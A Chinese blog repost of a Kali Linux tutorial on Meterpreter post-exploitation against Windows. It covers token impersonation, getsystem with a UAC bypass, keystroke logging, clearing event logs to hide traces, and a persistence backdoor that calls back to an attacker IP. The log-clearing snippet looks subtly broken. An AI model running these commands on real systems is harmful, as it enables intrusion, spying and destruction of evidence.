kalilinux-权限提升

最新推荐文章于 2024-04-21 11:33:11 发布
最新推荐文章于 2024-04-21 11:33:11 发布
阅读量535 收藏 1
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/itholidaycn/p/6394294.html
版权


meterpeter:

  1. 可以在 Meterpreter 使用 incognito 来开始模拟过程:
    use incognito
  2. 展示 incognito 的帮助文档,通过输入 help 命令:
    help
  3. 获得可用用户的列表
    list_tokens –u
  4. 模拟攻击
    impersonate_token \willie-pc\willie

本地提权攻击:
getsystem

如果你尝试获得 Windows 7 主机的访问,你必须在执行 getsystem 命令之前执
行 bypassuac 。 bypassuac 允许你绕过微软的用户账户控制。这个命令这样运
行: run post/windows/escalate/bypassuac 。

收集受害者数据:
keyscan_start
keyscan_dump
也可以使用 Wireshark 或
airodump-ng 来更简单地收集数据。

清理踪迹:

  1. 运行 IRB,以便进行日志移除操作。我们打开帮助文件:
    irb
  2. 下面,我们告诉 IRB 要移除哪个文件。下面是一个可用的选择:
    log = client.sys.eventlog.open('system')
    log = client.sys.eventlog.open('security')
    log = client.sys.eventlog.open('application')
    log = client.sys.eventlog.open('directory service')
    log = client.sys.eventlog.open('dns server')
    log = client.sys.eventlog.open('file replication service')
  3. 出于我们的目的,我们把它们都清理掉。你需要将这些一次键入:
    log = client.sys.eventlog.open('system')
    log = client.sys.eventlog.open('security')
    log = client.sys.eventlog.open('application')
    log = client.sys.eventlog.open('directory service')
    log = client.sys.eventlog.open('dns server')
    log = client.sys.eventlog.open('file replication service')
  4. 现在我们执行命令来清理日志文件:
    Log.clear

创建永久后门:
run persistence –h
696999-20170213161651254-1248597444.png

现在,我们执行命令来建立后门:
run persistence –U –A –i 10 – 8090 –r 192.168.10.109

后门现在已经建立了。如果成功的话,你会注意到你有了第二个 Meterpreter 会话。

转载于:https://www.cnblogs.com/itholidaycn/p/6394294.html

weixin_34387284
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux 秘籍 第七章 权限提升
热门推荐
龙哥盟
10-05 4万+
第七章 权限提升 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 简介我们已经获得了想要攻击的计算机的权限。于是将权限尽可能提升就非常重要。通常,我们能访问较低权限的用户账户(计算机用户),但是,我们的目标账户可能是管理员账户。这一章中我们会探索几种提升权限的方式。7.1 使用模拟令牌这个秘籍中,我
Kali-linux控制Meterpreter
2301_77162959的博客
05-17 1034
Meterpreter是Metasploit框架中的一个杀手锏,通常作为利用漏洞后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给用户一个控制通道。当使用Armitage、MSFCLI或MSFCONSOLE获取到目标系统上的一个Meterpreter连接时,用户必须使用Meterpreter传递攻击载荷。MSFCONSOLE用于管理用户的会话,而Meterpreter则是攻击载荷和渗透攻击交互。本节将介绍Meterpreter的使用。
kali下设置root权限(包含很多技巧)
最新发布
weixin_49765221的博客
04-21 233
新安装的kali下如何设置root?
kali linux将默认的非root提升为root权限
m0_57133702的博客
10-18 666
4、 按下”E“键后,会跳到这个界面,然后按下键(↓)光标会移动到“ linux ”开头的那一行!再将光标移到最后那里,空一格,输入“init=/bin/bash”,最终修改的内容如下图所示,后面无论写了什么,最后都要是“rw quiet splash init=/bin/bash”,差了哪个换那个,假设界面原本显示的是“ro abcdefg”,那么,我们就要改成“rw quiet splash init=/bin/bash”;3、到了这个界面后,在5秒的时间内按下“E”键(键盘上的E,不区分大小写);
Kali用户权限永久提升为root
ianTok
10-02 4653
Kali
kali永久提root权限
lrz1876的博客
01-17 7215
进入终端后输入 输入sudo su 输入kali密码(一般都是kali) 输入sudo -i 输入vim /etc/passwd(注意vim后有个空格) 5.找到倒数第二行的两个1000都改成0(光标指定后输入i就可以编辑) 改好之后按住shift然后按Z两下就可以保存,然后按esc退出,输入命令reboot重启kali就可以了 学习内容来自链接:link. 如有冒犯,请及时告知,一定及时删除! ...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
kali-linux-2021.3-vmware-amd64.part3.rar
09-29
Kali Linux VMware(kali-linux-2021.3-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2021.3-vmware-amd64.part3.rar ... kali-linux-2021.3-vmware-amd64.part2....
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-amd64.part4)
06-14
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-i386.ova)文件分割成 4个 压缩包,必须集齐4个 文件后才能一起解压一起使用: kali-linux-2022.2-virtualbox-amd64.part1 ...kali-linux-2022.2-virtualbox-amd...
如何在Kali Linux中获得root权限
2301_77498991的博客
05-05 1万+
在本教程中,我们学习了如何在Kali Linux中向普通用户授予root权限。你可以使用本指南中的说明,在任何命令前加上sudo,再也不用输入密码了。当Kali的开发者在最新的版本中限制root登录时,他们一定预料到一些用户会被激怒;因此,他们提供了许多恢复能力的选项。在使用根密码的时候,有一句话要注意:把它安全地控制起来;否则,系统就可能被破坏。我希望这篇文章对你在Kali Linux上工作时有指导意义。你可以使用这两种方法中的任何一种来获得系统中的root权限
kali-linux-2022 下载/系统/权限/中文/配置/换源等问题一次解决
weixin_54621472的博客
10-27 3151
很多人在安装kali的时候,会出现权限以及各种问题,今天我来教一下大家安装kali完整全过程以及配置。让你初次对kali有更好的了解(用图形化的方式来教给大家)
第10节Kali Linux系统调整文件及目录权限
Fighting_hawk的博客
01-21 9516
1. 掌握设置权限的作用; 2. 掌握权限的查看方式; 3. 理解权限中不同符号的含义; 4. 掌握对文件和目录设置权限的方法; 5. 掌握对目录和可执行文件设置特殊权限的方法; 6. 了解与权限相关的其他操作。...
Kali Metasploit工具简介
董哥的黑板报
07-24 4893
一、Metasploit的历史 在没有漏洞渗透工具框架的时候,渗透测试者往往需要自己收集漏洞渗透用代码,甚至自己编写针对漏洞用的代码,这个时期的渗透测试效率比较低 2003年左右,美国的H.D Moore和Spoonm创建了一个继承了多个漏洞渗透工具的框架。随后,这个框架在2004年的世界黑客交流会(Black Hat Briefings)上备受关注,Spoonm在大会的演讲中提到,Metas...
kali linux中meterpreter使用前的反弹shell及其基础语法
qq_42133828的博客
12-02 7864
一.反弹shell的类型: 1.reverse_tcp  (基于TCP反向链接反弹shell) 1).在kali linux终端中,生成一个反弹shell linux版: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=你kali本机的IP lport=随便选一个端口来接收信息 -f elf -o shell 如: msfveno...
kali2020提高权限到root
weixin_44110913的博客
05-06 1万+
kali更新到2020版后,默认取消了root用户的登录权限。只能用普通用户登录,这样做的优点在于对于kali的新手,在不懂的部分命令的情况下对系统的损害有所降低,也就说安全性提高了。但是普通用户权限实在太低,习惯了root权限的我们在2020中如何设置登录密码呢?kali 2020 root password重启系统,进入下面这个界面时按E进入此界面按E按↓到linux开头的一行。修改ro q...
Kali渗透测试之六提升权限
服务猿
05-12 3368
提升权限:获取目标系统的控制权是渗透成功的标志。审计人员也可以使用适用于目标系统的本地漏洞来提升自己的权限,只要他们能够在目标系统上运行提权漏洞利用程序,就可以获得主机上的超级用户权限或者系统级权限。审计人员还可以以该主机为跳板进一步攻击局域网络。(审计人员可能以各种方式获得与被控制系统有关的更多信息,具体地说,他们可能使用嗅探手段截获网络数据包,破解各种服务的密码,在局域网中使用网络欺骗手段...
kali linux 更新源 权限不够无法修改问题
L_longqihang的博客
03-21 1万+
执行:/etc/apt/sources.list权限不够,无法修改源的问题 解决方案:leafpad /etc/apt/sources.list然后将更新源复制在文本编辑器中保存退出,执行 :apt-get update            apt-get upgrade            apt-get dist-upgrade            apt-get clean...
kali linux提升root权限
06-28
要升级Kali Linux的root权限,您可以按照以下步骤操作: 1. 打开终端并以root用户身份登录。 2. 运行以下命令以更新您的系统:sudo apt-get update && sudo apt-get upgrade 3. 安装sudo软件包,如果您的系统上尚未...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值